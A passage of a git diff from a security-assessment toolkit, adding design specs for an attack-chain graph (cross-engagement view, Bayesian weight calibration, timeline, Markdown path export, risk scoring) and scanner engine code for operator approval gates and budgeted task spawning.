+- `force-graph` per-engagement standalone page at `/engagements/:id/chain`
+- "View Attack Chain" button on `EngagementDetailView`
+- `GET /api/chain/subgraph` with filtering, max_nodes cap, seed neighborhood expansion
+- `PATCH /api/chain/relations/:id` for edge curation (confirm/reject)
+- Severity color coding on nodes
+- MITRE tactic abbreviation pill on nodes
+- Edge style encoding (solid/dashed/red by status, opacity by weight)
+- Right-side detail panel with node info, edge reasons/rationale, confirm/reject
+- Drift badge on edges where reasons changed post-confirmation
+- Filter toolbar (severity and status toggles)
+- Legend bar with color key, edge style key, and node count
+- Empty state with "Run Analysis" → rebuild polling → auto-load
+- Optimistic curation updates
+- Position-preserving re-renders on filter change
+- Neighborhood expansion via explicit button in detail panel
+- Selected node/edge highlight indicator
+
+### 7.2 Out of scope (deferred)
+
+| Feature | Deferred to |
+|---------|-------------|
+| Global cross-engagement graph view | 3C.3 |
+| Swim lane layout by MITRE phase | 3C.3 |
+| Attack vector scoring | 3C.3 |
+| Timeline playback | 3C.3 |
+| Path-as-report export | 3C.3 |
+| Bayesian weight calibration | 3C.3 |
+| Cypher query DSL / query editor | 3C.4 |
+| Server-side node clustering/aggregation | 3C.3 |
+| Keyboard shortcuts for graph navigation | Future |
+| Canvas accessibility (screen reader support) | Future |
+
+## 8. Estimated size
+
+| Layer | New/Modified | Est. lines |
+|-------|-------------|------------|
+| Backend: subgraph endpoint + service method | New | ~150 |
+| Backend: relation PATCH endpoint | New | ~50 |
+| Backend: drift computation in DTO | Modified | ~30 |
+| Frontend: `ChainGraphView.vue` | New | ~200 |
+| Frontend: `ForceGraphCanvas.vue` | New | ~300 |
+| Frontend: `ChainDetailPanel.vue` | New | ~250 |
+| Frontend: `ChainFilterToolbar.vue` | New | ~80 |
+| Frontend: `ChainLegend.vue` | New | ~60 |
+| Frontend: `ChainEmptyState.vue` | New | ~80 |
+| Frontend: router + nav link | Modified | ~10 |
+| Tests: backend | New | ~250 |
+| Tests: frontend | New | ~150 |
+| **Total** | | **~1,610** |
+
+## 9. Forward context (for 3C.3, 3C.4)
+
+### 9.1 Cross-engagement view (3C.3)
+
+- The subgraph endpoint is scoped by `engagement_id` in 3C.2. In 3C.3, a `null` or omitted `engagement_id` returns user-wide cross-engagement data.
+- Swim lane layout by MITRE phase becomes an optional layout mode toggle on the toolbar.
+- If cross-engagement scale exceeds what `force-graph` handles comfortably even with max_nodes filtering, server-side node clustering (grouping findings by host or phase into aggregate nodes) is the next lever.
+
+### 9.2 Cypher DSL (3C.4)
+
+- The graph view gains a query editor panel (CodeMirror + Cypher mode) where users type queries. Results highlight matching subgraphs in the existing force-graph canvas.
+- No architectural changes needed — queries return canonical graph-json, which feeds through the same `to_force_graph()` adapter.
diff --git a/docs/superpowers/specs/2026-04-13-phase3c3-global-view-bayesian-calibration-design.md b/docs/superpowers/specs/2026-04-13-phase3c3-global-view-bayesian-calibration-design.md
new file mode 100644
index 0000000..4d15597
--- /dev/null
+++ b/docs/superpowers/specs/2026-04-13-phase3c3-global-view-bayesian-calibration-design.md
@@ -0,0 +1,403 @@
+# Phase 3C.3: Global View, Bayesian Calibration & Advanced Features — Design Specification
+
+**Date:** 2026-04-13
+**Status:** Draft
+**Author:** slabl + Claude
+**Depends on:** Phase 3C.2 (merged)
+
+## 1. Overview
+
+Phase 3C.3 adds six features to the attack chain infrastructure:
+
+1. **Global cross-engagement graph view** — standalone page showing findings across all engagements with engagement color coding and filter chips
+2. **Bayesian weight calibration** — Beta-prior Bayesian model that learns from user confirm/reject decisions to improve edge weights
+3. **Timeline playback** — time-range scrubber with activity heatmap and temporal anchoring for stable layout
+4. **Path-as-report export** — Markdown report from selected attack paths
+5. **Swim lane layout** — Kill Chain view with full lane dividers, phase headers, and curved inter-lane edges
+6. **Attack vector scoring** — path-level risk scores and node-level pivotality (betweenness centrality)
+
+No Cypher DSL (3C.4), no PDF export, no server-side clustering.
+
+## 2. Decisions
+
+| Decision | Choice | Rationale |
+|---|---|---|
+| Global view placement | Separate dedicated page at `/chain/global` | Cross-engagement work needs engagement color coding and filter chips — different UI affordances than the per-engagement page |
+| Global view node coloring | Engagement-based primary color, severity as ring/border | At cross-engagement scale, knowing which engagement a finding belongs to matters more than severity (which is shown on hover/click) |
+| Bayesian model | Full Bayesian with Beta distribution priors | Handles sparse data better than simple empirical counts; rules with few observations fall back to the prior gracefully |
+| Bayesian priors | Beta(2,1) for strong rules (shared_entity, cve_adjacency), Beta(1,1) for others | Encodes mild belief that entity-based rules are more reliable before any user data |
+| Calibration minimum threshold | 20 user-decided edges | Prevents wild swings from sparse data; below threshold, additive_v1 weights used unchanged |
+| Timeline approach | Temporal anchoring — pre-calculated layout, visibility animation | Prevents layout jitter; nodes exist at anchor positions, opacity controlled by time window |
+| Timeline interaction | Dual-handle time range selector with activity heatmap | Windowed time filtering more useful than linear playback for investigating specific time slices |
+| Report format | Markdown only | Immediately useful (paste into any report), no server-side rendering dependencies; PDF deferred to future |
+| Swim lane rendering | Full lane rendering — visible dividers, phase headers, curved inter-lane edges | More polished than fixed-X-free-Y; worth the rendering code investment |
+| Attack vector scoring | Both path-level risk scores and node-level pivotality | Different purposes: "which chain is most dangerous" vs "which finding is most pivotal"; neither is expensive to compute |
+| Pivotality computation | rustworkx betweenness_centrality on backend | Millisecond-scale even for 1,000 nodes; result added to subgraph response |
+
+## 3. Feature 1: Global Cross-Engagement View
+
+### 3.1 New page
+
+**Route:** `/chain/global`
+**Nav entry:** new "Attack Chain" item in the main Menubar (alongside Engagements, Recipes, Containers, IOCs).
+
+### 3.2 Backend changes
+
+The existing `GET /api/chain/subgraph` endpoint's `engagement_id` parameter becomes optional:
+- When provided: per-engagement behavior (unchanged from 3C.2)
+- When omitted: queries findings across all engagements for the authenticated user
+
+The `meta` response gains an `engagements` array:
+```json
+{
+  "meta": {
+    "total_findings": 4200,
+    "rendered_findings": 500,
+    "filtered": true,
+    "generation": 7,
+    "engagements": [
+      {"id": "eng-1", "name": "Corporate Pentest Q1"},
+      {"id": "eng-2", "name": "Web App Assessment"}
+    ]
+  }
+}
+```
+
+Node objects gain an `engagement_id` field so the frontend can color-code by engagement.
+
+### 3.3 Frontend
+
+**New component:** `GlobalChainView.vue` — page component similar to `ChainGraphView.vue` but with:
+- **Engagement color palette:** each engagement gets a distinct color from a 10-color palette. Nodes use engagement color as primary fill, severity as border ring.
+- **Engagement filter chips:** a row of toggle chips above the graph, one per engagement (name + color dot). Click to include/exclude. Default: all included. Toggling re-fetches the subgraph with an `engagement_ids` filter param.
+- **Cross-engagement edge emphasis:** edges from the `cross_engagement_ioc` rule rendered thicker with a distinct color (these are the most interesting cross-cutting connections).
+
+**Reuses:** `ForceGraphCanvas`, `ChainDetailPanel`, `ChainLegend`, `ChainFilterToolbar` components from 3C.2. `ForceGraphCanvas` needs a minor extension to accept a custom node color function (currently hardcoded to severity colors).
+
+### 3.4 Backend: engagement_ids filter
+
+New optional query parameter on `GET /api/chain/subgraph`:
+```
+engagement_ids=eng-1,eng-2
+```
+Only valid when `engagement_id` is omitted (global mode). Filters to findings from the specified engagements. Ignored if `engagement_id` is set. Enables the filter chips to exclude engagements without client-side filtering.
+
+## 4. Feature 2: Bayesian Weight Calibration
+
+### 4.1 Model
+
+Each of the 6 default linking rules gets a Beta(α, β) prior:
+
+| Rule | Default Prior | Rationale |
+|---|---|---|
+| shared_strong_entity | Beta(2, 1) | Strong entity matches are inherently reliable |
+| cve_adjacency | Beta(2, 1) | CVE-based links are high-signal |
+| temporal_proximity | Beta(1, 1) | Uninformative — could go either way |
+| kill_chain | Beta(1, 1) | Uninformative |
+| tool_chain | Beta(1, 1) | Uninformative |
+| cross_engagement_ioc | Beta(1, 1) | Uninformative |
+
+**Update rule:** for each user-decided edge:
+- Inspect which rules fired (from `reasons` list)
+- If `user_confirmed`: α += 1 for each fired rule
+- If `user_rejected`: β += 1 for each fired rule
+- Posterior mean for rule r = α_r / (α_r + β_r)
+
+**Re-scoring:** each edge's rule contributions are multiplied by the posterior mean for that rule. Edge weight is recomputed, `weight_model_version` set to `"bayesian_v1"`.
+
+**Minimum threshold:** 20 total user decisions (confirmed + rejected) required before calibration activates. Below that, the endpoint returns a 422 with a message indicating insufficient data.
+
+**Coexistence:** `additive_v1` and `bayesian_v1` edges coexist. Re-running the linker after calibration produces `bayesian_v1` edges; old edges are updated in place.
+
+### 4.2 Storage
+
+New table `ChainCalibrationState`:
+
+```python
+class ChainCalibrationState(SQLModel, table=True):
+    __tablename__ = "chain_calibration_state"
+    id: str = Field(primary_key=True)
+    user_id: uuid.UUID = Field(foreign_key="user.id", index=True)
+    rule: str                    # linking rule name
+    alpha: float = Field(default=1.0)
+    beta: float = Field(default=1.0)
+    observations: int = Field(default=0)
+    last_calibrated_at: datetime = Field(**_TZ_KW)
+```
+
+Max 6 rows per user (one per rule). Seeded with default priors on first calibration run.
+
+### 4.3 CLI command
+
+```
+opentools chain calibrate [--scope engagement|user] [--dry-run]
+```
+
+- `--scope user` (default): aggregates all user decisions across engagements
+- `--scope engagement --engagement <id>`: uses only decisions within one engagement
+- `--dry-run`: prints per-rule posteriors and edge count that would change, without writing
+
+### 4.4 Web endpoint
+
+```
+POST /api/chain/calibrate
+Body: { "scope": "user" }  // or { "scope": "engagement", "engagement_id": "..." }
+
+Response: {
+  "rules": [
+    {"rule": "shared_strong_entity", "alpha": 15, "beta": 3, "posterior": 0.833, "observations": 18},
+    ...
+  ],
+  "edges_updated": 142,
+  "below_threshold": false
+}
+```
+
+### 4.5 Graph view integration
+
+After calibration, the detail panel shows both weights when viewing an edge:
+- "Weight: 0.82 (additive)" or "Weight: 0.91 (calibrated)"
+- Small "Calibrated" badge on edges with `weight_model_version="bayesian_v1"`
+
+## 5. Feature 3: Timeline Playback
+
+### 5.1 Layout strategy
+
+1. On page load, the full subgraph is fetched and `force-graph` runs its simulation to completion (warmup phase)
+2. All node positions (x, y) are recorded as "anchor" positions
+3. During playback, nodes exist at their anchor positions but visibility is controlled by opacity — `0` when outside the time window, `1` when inside, with a 200ms fade transition
+4. Edges are visible only when both endpoints are visible
+
+### 5.2 Backend change
+
+Add `created_at` to node objects in the subgraph response:
+```json
+{
+  "id": "f-abc",
+  "name": "SQL Injection in /login",
+  "severity": "critical",
+  "tool": "sqlmap",
+  "phase": "initial-access",
+  "created_at": "2026-04-10T14:30:00Z"
+}
+```
+
+### 5.3 UI components
+
+**New component:** `ChainTimelineScrubber.vue`
+
+- **Dual-handle slider:** two handles on a horizontal bar. Left = window start, right = window end. Drag either to adjust.
+- **Play button:** left of the scrubber. Animates the left handle forward at configurable speed (1x, 2x, 5x, 10x via dropdown).
+- **Activity heatmap:** rendered on the scrubber bar background as a histogram of node density over time. Bright spikes indicate bursts of discovery.
+- **Time readout:** displays the current window as "Apr 10 14:00 – Apr 10 14:15" above the scrubber.
+- **Reset button:** sets window to full time range (all nodes visible).
+
+### 5.4 Integration
+
+The scrubber emits a `time-range-change` event with `{ start: Date, end: Date }`. The parent page (`ChainGraphView` or `GlobalChainView`) passes this to `ForceGraphCanvas`, which applies opacity filtering to nodes based on their `created_at`.
+
+`ForceGraphCanvas` changes:
+- Accept optional `timeRange: { start: Date, end: Date } | null` prop
+- In `nodeCanvasObject`, set node opacity to 0 if `created_at` is outside the range
+- In `linkCanvasObject`, set edge opacity to 0 if either endpoint is hidden
+- Edges and nodes that are outside the time window are not interactive (clicks pass through)
+
+### 5.5 Applies to both pages
+
+The timeline scrubber is available on both `/engagements/:id/chain` and `/chain/global`.
+
+## 6. Feature 4: Path-as-Report Export
+
+### 6.1 Backend endpoint
+
+```
+POST /api/chain/export/path
+Body: {
+  "finding_ids": ["f-1", "f-2", "f-3", "f-4"],
+  "engagement_id": "eng-1"  // optional, for report header
+}
+
+Response: {
+  "markdown": "# Attack Path Report: Corporate Pentest Q1\n\n..."
+}
+```
+
+The endpoint:
+1. Fetches each finding in order
+2. Fetches the relation between consecutive findings for linking reasons
+3. Assembles the Markdown using a template
+4. If the existing narration module has LLM access, generates a one-paragraph summary; otherwise uses a template-based summary
+
+### 6.2 Markdown structure
+
+```markdown
+# Attack Path Report
+
+**Engagement:** [name]
+**Generated:** [timestamp]
+**Path length:** [N] steps
+**Risk score:** [score]/10
+
+## Summary
+
+[Template-based or LLM-generated narrative summarizing the attack path]
+
+## Step 1: [finding title] ([severity])
+
+- **Tool:** [tool]
+- **Phase:** [MITRE phase]
+- **Evidence:** [evidence field, truncated to 500 chars]
+- **Remediation:** [remediation field]
+
+**Link to Step 2:** [rule reasons], weight: [weight]
+
+## Step 2: [finding title] ([severity])
+...
+
+## Recommendations
+
+[Ordered list of remediation steps from each finding's remediation field, deduplicated]
+```
+
+### 6.3 CLI command
+
+```
+opentools chain path <from> <to> --format markdown
+```
+
+Extends the existing `chain path` command with `markdown` as a new format option alongside `table`, `json`, `graph-json`, `dot`.
+
+### 6.4 Frontend
+
+"Export Path" button in `ChainDetailPanel` when a path is displayed. Clicks the endpoint and triggers a browser download of `attack-path-report.md`.
+
+## 7. Feature 5: Swim Lane Layout (Kill Chain Mode)
+
+### 7.1 Toggle
+
+"Layout" button in the toolbar toggles between "Force" (default) and "Kill Chain". State persisted in the component (not in URL).
+
+### 7.2 Kill Chain rendering
+
+When active:
+- **Lane columns:** one per MITRE tactic phase, ordered left-to-right: Reconnaissance → Resource Development → Initial Access → Execution → Persistence → Privilege Escalation → Defense Evasion → Credential Access → Discovery → Lateral Movement → Collection → C2 → Exfiltration → Impact. Plus an "Other" lane on the far right for findings without a phase.
+- **Lane dividers:** vertical lines rendered on the canvas via `onRenderFramePost` callback. Subtle dashed lines with phase header labels at the top.
+- **Node positioning:** `fx` set to the lane center X coordinate based on node's `phase` field. Force simulation handles Y positioning freely within each lane.
+- **Inter-lane edges:** rendered as quadratic bezier curves to avoid visual clutter. Control point offset perpendicular to the straight-line path.
+- **Intra-lane edges:** rendered as short arcs (semicircular curves) within the lane.
+
+### 7.3 ForceGraphCanvas changes
+
+- Accept `layoutMode: 'force' | 'killchain'` prop
+- When `killchain`: compute lane X positions from canvas width, set `fx` on all nodes, swap `linkCanvasObject` to bezier rendering, add `onRenderFramePost` for lane dividers
+- When switching back to `force`: clear `fx`/`fy`, restore straight-line edge rendering, remove lane dividers
+
+## 8. Feature 6: Attack Vector Scoring
+
+### 8.1 Path risk score
+
+For each path from k-shortest-paths results:
+
+```
+score = sum(edge_weights) * max_severity_multiplier / hop_count_penalty
+```
+
+Severity multipliers: critical=5, high=4, medium=3, low=2, info=1.
+`max_severity_multiplier` = highest severity multiplier among all findings in the path.
+`hop_count_penalty` = `sqrt(hop_count)` (longer paths are penalized but not linearly).
+
+Normalized to 0-10 scale. Displayed in the detail panel when a path is viewed, and included in the Markdown export.
+
+### 8.2 Node pivotality score
+
+Betweenness centrality computed via `rustworkx.betweenness_centrality()` on the subgraph. Added to each node in the subgraph response:
+
+```json
+{
+  "id": "f-abc",
+  "name": "SQL Injection in /login",
+  "severity": "critical",
+  "tool": "sqlmap",
+  "phase": "initial-access",
+  "created_at": "2026-04-10T14:30:00Z",
+  "pivotality": 0.73
+}
+```
+
+**Visualization:** nodes with high pivotality get a glow effect — a larger, semi-transparent circle behind the main node circle. Intensity proportional to pivotality score. Helps users spot single points of failure at a glance.
+
+**Computation:** performed server-side in the subgraph service method. `rustworkx.betweenness_centrality()` returns a dict of node_index → score; mapped to finding IDs and normalized to 0-1.
+
+## 9. Testing
+
+### 9.1 Backend tests
+
+- **Subgraph global mode:** `engagement_id` omitted returns cross-engagement data with `engagements` in meta
+- **Subgraph engagement_ids filter:** returns only findings from specified engagements
+- **Subgraph node fields:** `created_at`, `pivotality`, `engagement_id` present in response
+- **Calibration endpoint:** enough decisions → returns posteriors + edges_updated; below threshold → 422; dry-run → no writes
+- **Calibration math:** known inputs (5 confirmed, 2 rejected for a rule with Beta(2,1) prior) → correct posterior (α=7, β=3, posterior=0.7)
+- **Export endpoint:** valid path → Markdown string with all sections; invalid finding_ids → 404
+- **Pivotality computation:** known star-topology graph → center node has highest score
+- **Path risk score:** known path → expected normalized score
+
+### 9.2 Frontend tests
+
+- **Timeline scrubber:** emits correct time range on handle drag; play button advances handle
+- **Engagement filter chips:** toggle emits correct engagement_ids
+- **Layout toggle:** switching modes emits correct layoutMode
+- **No canvas tests** (manual verification for rendering)
+
+## 10. Scope Boundaries
+
+### 10.1 In scope
+
+- Global cross-engagement page at `/chain/global` with engagement color coding and filter chips
+- `engagement_id` made optional on subgraph endpoint; `engagement_ids` filter added
+- `engagement_id`, `created_at`, `pivotality` added to subgraph node response
+- `engagements` array added to subgraph meta response
+- Bayesian calibration: Beta priors, `ChainCalibrationState` table, CLI command, web endpoint
+- Timeline playback: dual-handle scrubber, activity heatmap, temporal anchoring, configurable speed
+- Path-as-report: Markdown export endpoint, CLI format option, frontend download button
+- Swim lane: Kill Chain toggle, full lane dividers with headers, curved inter-lane edges
+- Path risk scoring: composite score displayed in detail panel and export
+- Node pivotality: betweenness centrality, glow visualization
+
+### 10.2 Out of scope
+
+| Feature | Deferred to |
+|---------|-------------|
+| Cypher query DSL / query editor | 3C.4 |
+| PDF report export | Future |
+| Server-side node clustering/aggregation | Future |
+| Keyframe auto-detection for timeline | Future |
+| Mark-as-keyframe for report synergy | Future |
+| Multi-user calibration (shared priors across team) | 3D |
+| Activity heatmap as separate standalone widget | Future |
+
+## 11. Estimated Size
+
+| Layer | Est. lines |
+|-------|------------|
+| Backend: subgraph endpoint changes (optional engagement_id, engagement_ids, created_at, pivotality, engagements meta) | ~100 |
+| Backend: calibration service + endpoint + CLI | ~300 |
+| Backend: export endpoint + CLI format | ~150 |
+| Backend: pivotality computation | ~40 |
+| Backend: Alembic migration (calibration_state table) | ~30 |
+| Frontend: GlobalChainView.vue (page + engagement chips) | ~250 |
+| Frontend: ChainTimelineScrubber.vue | ~200 |
+| Frontend: ForceGraphCanvas.vue extensions (time filtering, kill chain layout, pivotality glow, engagement colors) | ~300 |
+| Frontend: ChainDetailPanel.vue extensions (calibrated badge, path export button, risk score) | ~50 |
+| Frontend: router + nav | ~10 |
+| Tests: backend | ~300 |
+| Tests: frontend | ~100 |
+| **Total** | **~1,830** |
+
+## 12. Forward Context (for 3C.4)
+
+### 12.1 Cypher DSL integration
+
+- The global graph view gains a query editor panel (CodeMirror + Cypher mode) in 3C.4
+- Query results highlight matching subgraphs in the existing force-graph canvas
+- No architectural changes needed from 3C.3 — queries return canonical graph-json through `to_force_graph()` adapter
+- The Kill Chain layout mode works with query-filtered subgraphs the same way it works with filter-chip-filtered subgraphs
diff --git a/packages/cli/src/opentools/scanner/api.py b/packages/cli/src/opentools/scanner/api.py
index 8704343..45a07c2 100644
--- a/packages/cli/src/opentools/scanner/api.py
+++ b/packages/cli/src/opentools/scanner/api.py
@@ -149,6 +149,7 @@ async def execute(
         Returns:
             Updated Scan object with final status.
         """
+        from opentools.scanner.approval import ApprovalRegistry
         from opentools.scanner.engine import ScanEngine
         from opentools.shared.progress import EventBus
         from opentools.shared.resource_pool import AdaptiveResourcePool
@@ -156,11 +157,15 @@ async def execute(
         cancel = CancellationToken()
         event_bus = EventBus()
 
-        # Set up resource pool
+        # Set up resource pool — approval_gate group is unlimited so gates
+        # never block on the concurrency limiter.
         max_concurrent = 8
         if scan.config and scan.config.max_concurrent_tasks:
             max_concurrent = scan.config.max_concurrent_tasks
-        pool = AdaptiveResourcePool(global_limit=max_concurrent)
+        pool = AdaptiveResourcePool(
+            global_limit=max_concurrent,
+            group_limits={"approval_gate": 9999},
+        )
 
         # Build executors — register available executors.
         # DockerExecExecutor requires a container_id and is not registered here;
@@ -196,10 +201,15 @@ async def execute(
             pipeline=pipeline,
         )
 
+        # Wire HITL approval gate support
+        approval_registry = ApprovalRegistry()
+        engine.set_approval_registry(approval_registry)
+
         _active_scans[scan.id] = {
             "scan": scan,
             "cancel": cancel,
             "engine": engine,
+            "approval_registry": approval_registry,
         }
 
         try:
diff --git a/packages/cli/src/opentools/scanner/approval.py b/packages/cli/src/opentools/scanner/approval.py
new file mode 100644
index 0000000..29cdb21
--- /dev/null
+++ b/packages/cli/src/opentools/scanner/approval.py
@@ -0,0 +1,32 @@
+"""ApprovalRegistry — in-memory notification hub for HITL approval gates.
+
+NOT the source of truth. The database is always authoritative.
+This registry only holds asyncio.Event handles for waking sleeping gates.
+"""
+from __future__ import annotations
+import asyncio
+
+class ApprovalRegistry:
+    def __init__(self) -> None:
+        self._events: dict[str, asyncio.Event] = {}
+
+    def register(self, ticket_id: str) -> asyncio.Event:
+        event = asyncio.Event()
+        self._events[ticket_id] = event
+        return event
+
+    def signal(self, ticket_id: str) -> bool:
+        event = self._events.get(ticket_id)
+        if event is None:
+            return False
+        event.set()
+        return True
+
+    def remove(self, ticket_id: str) -> None:
+        self._events.pop(ticket_id, None)
+
+    def has_ticket(self, ticket_id: str) -> bool:
+        return ticket_id in self._events
+
+    def pending_ticket_ids(self) -> set[str]:
+        return set(self._events.keys())
diff --git a/packages/cli/src/opentools/scanner/engine.py b/packages/cli/src/opentools/scanner/engine.py
index 0839369..c6a7db6 100644
--- a/packages/cli/src/opentools/scanner/engine.py
+++ b/packages/cli/src/opentools/scanner/engine.py
@@ -16,6 +16,7 @@
     TaskStatus,
     TaskType,
 )
+from opentools.scanner.mutation.models import KillChainState
 from opentools.shared.progress import EventBus
 from opentools.shared.resource_pool import AdaptiveResourcePool
 
@@ -68,6 +69,16 @@ def __init__(
         # Pipeline results: task_id → output, processed during scheduling
         self._pipeline_results: dict[str, TaskOutput] = {}
 
+        # Mutation layer (optional — engine works without it)
+        self._analyzer_registry: Any | None = None
+        self._mutation_strategies: list[Any] = []
+        self._kill_chain = KillChainState()
+        self._max_mutation_spawns: int = 100
+
+        # Approval gate (optional — engine works without it)
+        self._approval_registry: Any | None = None
+        self._approval_store: Any | None = None
+
     # ------------------------------------------------------------------
     # Public API
     # ------------------------------------------------------------------
@@ -121,6 +132,31 @@ def set_cache(self, cache: dict[str, TaskOutput]) -> None:
         """Set the in-memory output cache (stub for real cache backend)."""
         self._cache = cache
 
+    def set_analyzer_registry(self, registry: Any) -> None:
+        """Set the OutputAnalyzer registry for mutation layer."""
+        self._analyzer_registry = registry
+
+    def set_mutation_strategies(self, strategies: list[Any]) -> None:
+        """Set the mutation strategies for dynamic task injection."""
+        self._mutation_strategies = list(strategies)
+
+    def set_max_mutation_spawns(self, limit: int) -> None:
+        """Set the global budget for mutation-spawned tasks."""
+        self._max_mutation_spawns = limit
+
+    def set_approval_registry(self, registry: Any) -> None:
+        """Set the ApprovalRegistry for HITL gate support."""
+        self._approval_registry = registry
+
+    def set_approval_store(self, store: Any) -> None:
+        """Set the store for persisting gate state (must have update_task_status and get_task_status)."""
+        self._approval_store = store
+
+    @property
+    def kill_chain_state(self) -> KillChainState:
+        """Read-only access to accumulated attack surface state."""
+        return self._kill_chain
+
     async def run(self) -> None:
         """Execute the full task DAG."""
         self.scan.status = ScanStatus.RUNNING
@@ -215,11 +251,22 @@ async def _schedule_loop(self) -> None:
     async def _execute_task(
         self, task: ScanTask, executor: TaskExecutor
     ) -> TaskOutput:
-        """Check cache → acquire resource → dispatch to executor → release."""
+        """Check cache → gate phase → acquire resource → dispatch to executor → release."""
         # Cache check
         if task.cache_key and task.cache_key in self._cache:
             return self._cache[task.cache_key]
 
+        # --- GATE PHASE (if requires_approval and registry configured) ---
+        if (
+            task.requires_approval is not None
+            and self._approval_registry is not None
+            and self._approval_store is not None
+        ):
+            gate_result = await self._run_approval_gate(task)
+            if gate_result is not None:
+                return gate_result  # rejected or expired — don't execute
+
+        # --- NORMAL EXECUTION ---
         resource_group = task.resource_group or task.task_type.value
 
         if task.retry_policy is not None:
@@ -250,6 +297,83 @@ async def _attempt() -> TaskOutput:
 
         return output
 
+    # ------------------------------------------------------------------
+    # Approval gate
+    # ------------------------------------------------------------------
+
+    async def _run_approval_gate(self, task: ScanTask) -> TaskOutput | None:
+        """Execute the approval gate phase.
+        Returns None if approved (proceed to executor).
+        Returns TaskOutput if rejected/expired (stop)."""
+        import uuid
+        from datetime import datetime, timedelta, timezone
+
+        timeout = task.requires_approval.timeout_seconds
+        ticket_id = f"gate-{task.id}-{uuid.uuid4().hex[:8]}"
+        expires_at = datetime.now(timezone.utc) + timedelta(seconds=timeout)
+
+        # 1. PERSIST to store (source of truth)
+        task.approval_ticket_id = ticket_id
+        task.approval_expires_at = expires_at
+        await self._approval_store.update_task_status(
+            task.id, TaskStatus.AWAITING_APPROVAL.value,
+            approval_ticket_id=ticket_id,
+            approval_expires_at=expires_at.isoformat(),
+        )
+
+        # 2. Publish event (best-effort — dict payload, not ProgressEvent)
+        try:
+            await self._event_bus.publish({
+                "type": "approval_required",
+                "scan_id": self.scan.id,
+                "task_id": task.id,
+                "ticket_id": ticket_id,
+                "tool": task.tool,
+                "command": task.command,
+                "description": task.requires_approval.description,
+                "expires_at": expires_at.isoformat(),
+            })
+        except Exception:
+            pass
+
+        # 3. Register event and sleep
+        event = self._approval_registry.register(ticket_id)
+
+        remaining = (expires_at - datetime.now(timezone.utc)).total_seconds()
+        if remaining <= 0:
+            self._approval_registry.remove(ticket_id)
+            await self._approval_store.update_task_status(task.id, "approval_expired")
+            return TaskOutput(exit_code=2, stderr="approval expired before gate could sleep")
+
+        # Acquire from unlimited approval_gate group while sleeping
+        await self._pool.acquire(task.id, task.priority, "approval_gate")
+        try:
+            try:
+                await asyncio.wait_for(event.wait(), timeout=remaining)
+            except asyncio.TimeoutError:
+                pass  # handled by DB read below
+        finally:
+            self._pool.release("approval_gate")
+            self._approval_registry.remove(ticket_id)
+
+        # 4. READ TRUTH from store (never trust why we woke up)
+        stored = await self._approval_store.get_task_status(task.id)
+        if stored is not None:
+            status = stored.get("status", "")
+        else:
+            status = ""
+
+        if status == "approved":
+            task.status = TaskStatus.RUNNING
+            return None  # proceed to executor
+
+        if status == "rejected":
+            return TaskOutput(exit_code=1, stderr="rejected by operator")
+
+        # Timeout or unknown state
+        await self._approval_store.update_task_status(task.id, "approval_expired")
+        return TaskOutput(exit_code=2, stderr="approval expired")
+
     # ------------------------------------------------------------------
     # State management
     # ------------------------------------------------------------------
@@ -268,10 +392,15 @@ def _mark_completed(self, task_id: str, output: TaskOutput) -> None:
         if self._pipeline is not None:
             self._pipeline_results[task_id] = output
 
-        # Evaluate reactive edges
-        new_tasks = self._evaluate_edges(task, output)
-        if new_tasks:
-            self._inject_tasks(new_tasks)
+        # Mutation layer (new)
+        mutation_tasks = self._evaluate_mutations(task, output)
+
+        # Existing reactive edges (backward compatible)
+        edge_tasks = self._evaluate_edges(task, output)
+
+        all_new = mutation_tasks + edge_tasks
+        if all_new:
+            self._inject_tasks(all_new)
 
     def _mark_failed(self, task_id: str, reason: str) -> None:
         task = self._tasks[task_id]
@@ -347,11 +476,71 @@ def _evaluate_edges(self, task: ScanTask, output: TaskOutput) -> list[ScanTask]:
 
         return new_tasks
 
+    # ------------------------------------------------------------------
+    # Mutation layer
+    # ------------------------------------------------------------------
+
+    def _evaluate_mutations(
+        self, task: ScanTask, output: TaskOutput
+    ) -> list[ScanTask]:
+        """Run mutation layer: analyze output, update state, evaluate strategies."""
+        if self._analyzer_registry is None:
+            return []
+
+        # 1. Extract intel from tool output
+        analyzer = self._analyzer_registry.get(task.tool)
+        if analyzer is not None and output.stdout:
+            bundle = analyzer.analyze(output.stdout, output.stderr or "")
+            self._kill_chain.ingest(bundle)
+
+        # 2. Evaluate strategies against accumulated state
+        new_tasks: list[ScanTask] = []
+        if self._kill_chain.total_spawned >= self._max_mutation_spawns:
+            return []
+
+        for strategy in self._mutation_strategies:
+            budget_used = self._kill_chain.tasks_spawned.get(strategy.name, 0)
+            if budget_used >= strategy.max_spawns:
+                continue
+
+            remaining_strategy = strategy.max_spawns - budget_used
+            remaining_global = self._max_mutation_spawns - self._kill_chain.total_spawned
+
+            spawned = strategy.evaluate(self._kill_chain, self.scan.id, task)
+
+            allowed = min(remaining_strategy, remaining_global, len(spawned))
+            accepted: list[ScanTask] = []
+            for s in spawned[:allowed]:
+                if s.id not in self._tasks:
+                    accepted.append(s)
+
+            if accepted:
+                self._kill_chain.record_spawn(strategy.name, len(accepted))
+                new_tasks.extend(accepted)
+
+        return new_tasks
+
+    # ------------------------------------------------------------------
+    # Task injection
+    # ------------------------------------------------------------------
+
     def _inject_tasks(self, tasks: list[ScanTask]) -> None:
-        """Add dynamically spawned tasks to the graph."""
+        """Add dynamically spawned tasks to the graph.
+        Validates that all dependencies exist. Drops tasks with unknown deps."""
         for t in tasks:
             if t.id in self._tasks:
                 continue
-            self._tasks[t.id] = t
+            valid = True
             for dep in t.depends_on:
-                self._dependents[dep].add(t.id)
+                if dep not in self._tasks:
+                    import logging
+                    logging.getLogger(__name__).warning(
+                        "Dropping spawned task %s: depends on unknown task %s",
+                        t.id, dep,
+                    )
+                    valid = False
+                    break
+            if valid:
+                self._tasks[t.id] = t
+                for dep in t.depends_on:
+                    self._dependents[dep].add(t.id)
diff --git a/packages/cli/src/opentools/scanner/executor/__init__.py b/packages/cli/src/opentools/scanner/executor/__init__.py
index 05325e8..617529d 100644
--- a/packages/cli/src/opentools/scanner/executor/__init__.py
+++ b/packages/cli/src/opentools/scanner/executor/__init__.py
@@ -3,12 +3,14 @@
 from opentools.scanner.executor.base import TaskExecutor, TaskOutput
 from opentools.scanner.executor.docker import DockerExecExecutor
 from opentools.scanner.executor.mcp import McpConnection, McpExecutor
+from opentools.scanner.executor.proxied_shell import ProxiedShellExecutor
 from opentools.scanner.executor.shell import ShellExecutor
 
 __all__ = [
     "DockerExecExecutor",
     "McpConnection",
     "McpExecutor",
+    "ProxiedShellExecutor",
     "ShellExecutor",
